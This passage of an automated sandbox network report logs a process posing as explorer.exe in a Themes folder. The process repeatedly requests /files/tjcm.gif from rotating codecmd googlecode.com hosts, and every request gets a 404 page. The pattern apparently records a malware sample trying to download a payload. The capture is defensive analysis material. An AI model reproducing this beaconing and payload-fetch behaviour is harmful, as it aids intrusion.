                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      106192.168.2.549820108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:04.084420919 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:04.766016960 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:04 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:04.766563892 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      107192.168.2.549821108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:05.224294901 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:05.919747114 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:05 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:05.919806004 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      108192.168.2.54982274.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:06.347136021 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:07.022775888 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:06 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:07.023145914 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      109192.168.2.549823108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:07.409645081 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:08.238502979 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:08 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:08.238526106 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      110192.168.2.549824108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:09.274780989 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:09.973231077 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:09 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:09.973356009 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      111192.168.2.54982574.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:10.401736021 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:11.119865894 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:11 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:11.119909048 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      112192.168.2.549826108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:11.889044046 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:12.561253071 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:12 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:12.561273098 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      113192.168.2.549827108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
